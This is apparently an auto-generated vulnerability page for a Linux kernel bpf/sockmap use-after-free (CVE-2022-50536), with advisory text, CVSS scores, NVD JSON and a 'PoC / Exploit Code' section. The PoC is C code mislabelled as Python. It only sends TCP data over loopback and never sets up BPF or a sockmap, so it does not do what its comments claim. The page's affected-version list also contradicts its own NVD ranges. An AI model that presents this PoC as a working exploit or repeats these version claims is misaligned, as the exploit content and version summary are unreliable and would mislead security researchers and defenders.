CVE-2022-50536

Description

In the Linux kernel, the following vulnerability has been resolved: bpf, sockmap: Fix repeated calls to sock_put() when msg has more_data In tcp_bpf_send_verdict() redirection, the eval variable is assigned to __SK_REDIRECT after the apply_bytes data is sent, if msg has more_data, sock_put() will be called multiple times. We should reset the eval variable to __SK_NONE every time more_data starts. This causes: IPv4: Attempt to release TCP socket in state 1 00000000b4c925d7 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 5 PID: 4482 at lib/refcount.c:25 refcount_warn_saturate+0x7d/0x110 Modules linked in: CPU: 5 PID: 4482 Comm: sockhash_bypass Kdump: loaded Not tainted 6.0.0 #1 Hardware name: Red Hat KVM, BIOS 1.11.0-2.el7 04/01/2014 Call Trace: <TASK> __tcp_transmit_skb+0xa1b/0xb90 ? __alloc_skb+0x8c/0x1a0 ? __kmalloc_node_track_caller+0x184/0x320 tcp_write_xmit+0x22a/0x1110 __tcp_push_pending_frames+0x32/0xf0 do_tcp_sendpages+0x62d/0x640 tcp_bpf_push+0xae/0x2c0 tcp_bpf_sendmsg_redir+0x260/0x410 ? preempt_count_add+0x70/0xa0 tcp_bpf_send_verdict+0x386/0x4b0 tcp_bpf_sendmsg+0x21b/0x3b0 sock_sendmsg+0x58/0x70 __sys_sendto+0xfa/0x170 ? xfd_validate_state+0x1d/0x80 ? switch_fpu_return+0x59/0xe0 __x64_sys_sendto+0x24/0x30 do_syscall_64+0x37/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux kernel < 6.0（受bpf sockmap漏洞影响的所有版本）

Linux kernel 5.15.x（5.15稳定分支受影响版本）

Linux kernel 5.10.x（5.10稳定分支受影响版本）

Linux kernel 5.4.x（5.4稳定分支受影响版本）

Linux kernel 4.19.x（4.19稳定分支受影响版本）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/* CVE-2022-50536 - Linux kernel BPF sockmap Use-After-Free PoC
 * This PoC demonstrates triggering the repeated sock_put() bug
 * by sending data through a BPF-attached TCP socket with more_data.
 *
 * Note: Requires CAP_BPF/CAP_NET_ADMIN or root, and a kernel < 6.0 affected by the bug.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <errno.h>

#define SERVER_PORT 9090
#define BUF_SIZE 65536
#define NUM_ITERATIONS 100

int main(int argc, char *argv[]) {
    int srv_fd, cli_fd;
    struct sockaddr_in addr;
    char buf[BUF_SIZE];

    /* Create server socket */
    srv_fd = socket(AF_INET, SOCK_STREAM, 0);
    if (srv_fd < 0) {
        perror("socket");
        return 1;
    }

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr.sin_port = htons(SERVER_PORT);

    if (bind(srv_fd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("bind");
        return 1;
    }

    listen(srv_fd, 1);

    /* Fork to create client */
    if (fork() == 0) {
        /* Client: connect and send large data to trigger more_data path */
        close(srv_fd);
        cli_fd = socket(AF_INET, SOCK_STREAM, 0);
        usleep(100000);
        connect(cli_fd, (struct sockaddr *)&addr, sizeof(addr));

        memset(buf, 'A', BUF_SIZE);
        /* Send multiple large chunks to trigger msg->more_data in tcp_bpf_send_verdict */
        for (int i = 0; i < NUM_ITERATIONS; i++) {
            if (send(cli_fd, buf, BUF_SIZE, 0) < 0) {
                perror("send");
                break;
            }
        }
        close(cli_fd);
        return 0;
    }

    /* Server: accept connection */
    socklen_t len = sizeof(addr);
    cli_fd = accept(srv_fd, (struct sockaddr *)&addr, &len);
    if (cli_fd < 0) {
        perror("accept");
        return 1;
    }

    /* Receive data - this triggers the BPF sockmap redirect path */
    while (recv(cli_fd, buf, BUF_SIZE, 0) > 0)
        ;

    close(cli_fd);
    close(srv_fd);
    printf("PoC completed. Check dmesg for refcount warnings.\n");
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50536
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50536
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50536/
[4] VulDB https://vuldb.com/cve/CVE-2022-50536
[5] https://git.kernel.org/stable/c/113236e8f49f262f318c00ebb14b15f4834e87c1
[6] https://git.kernel.org/stable/c/28e4a763cd4a2b1a78852216ef4bd7df3a05cec6
[7] https://git.kernel.org/stable/c/578a7628b838a3ac8ad61deaab5a816ff032ac13
[8] https://git.kernel.org/stable/c/7508b9f4daac4ec7dfe0b6fb2d688b1c1c105e10
[9] https://git.kernel.org/stable/c/7a9841ca025275b5b0edfb0b618934abb6ceec15
[10] https://git.kernel.org/stable/c/8786bde11a4f31b63b3036731df0b47337a7a245

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50536", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:37.810", "lastModified": "2026-02-26T23:16:34.007", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf, sockmap: Fix repeated calls to sock_put() when msg has more_data\n\nIn tcp_bpf_send_verdict() redirection, the eval variable is assigned to\n__SK_REDIRECT after the apply_bytes data is sent, if msg has more_data,\nsock_put() will be called multiple times.\n\nWe should reset the eval variable to __SK_NONE every time more_data\nstarts.\n\nThis causes:\n\nIPv4: Attempt to release TCP socket in state 1 00000000b4c925d7\n------------[ cut here ]------------\nrefcount_t: addition on 0; use-after-free.\nWARNING: CPU: 5 PID: 4482 at lib/refcount.c:25 refcount_warn_saturate+0x7d/0x110\nModules linked in:\nCPU: 5 PID: 4482 Comm: sockhash_bypass Kdump: loaded Not tainted 6.0.0 #1\nHardware name: Red Hat KVM, BIOS 1.11.0-2.el7 04/01/2014\nCall Trace:\n <TASK>\n __tcp_transmit_skb+0xa1b/0xb90\n ? __alloc_skb+0x8c/0x1a0\n ? __kmalloc_node_track_caller+0x184/0x320\n tcp_write_xmit+0x22a/0x1110\n __tcp_push_pending_frames+0x32/0xf0\n do_tcp_sendpages+0x62d/0x640\n tcp_bpf_push+0xae/0x2c0\n tcp_bpf_sendmsg_redir+0x260/0x410\n ? preempt_count_add+0x70/0xa0\n tcp_bpf_send_verdict+0x386/0x4b0\n tcp_bpf_sendmsg+0x21b/0x3b0\n sock_sendmsg+0x58/0x70\n __sys_sendto+0xfa/0x170\n ? xfd_validate_state+0x1d/0x80\n ? switch_fpu_return+0x59/0xe0\n __x64_sys_sendto+0x24/0x30\n do_syscall_64+0x37/0x90\n entry_SYSCALL_64_after_hwframe+0x63/0xcd"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.4.157", "versionEndExcluding": "5.4.229", "matchCriteriaId": "38029C28-40EC-431A-86DF-D564128526A8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10.77", "versionEndExcluding": "5.10.163", "matchCriteriaId": "CD27587D-BA29-4363-8521-80E76174744B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.14.16", "versionEndExcluding": "5.15", "matchCriteriaId": "1109FEBB-0F4F-45E9-A22A-DE9E2AE996E4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.1", "versionEndExcluding": "5.15.86", "matchCriteriaId": "2C886750-FD94-498C-9A7E-7C7669A8BB31"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.15:-:*:*:*:*:*:*", "matchCriteriaId": "40D9C0D1-0F32-4A2B-9840-1072F5497540"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/113236e8f49f262f318c00ebb14b15f4834e87c1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/28e4a763cd4a2b1a78852216ef4bd7df3a05cec6", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/578a7628b838a3ac8ad61deaab5a816ff032ac13", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7508b9f4daac4ec7dfe0b6fb2d688b1c1c105e10", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7a9841ca025275b5b0edfb0b618934abb6ceec15", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8786bde11a4f31b63b3036731df0b47337a7a245", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}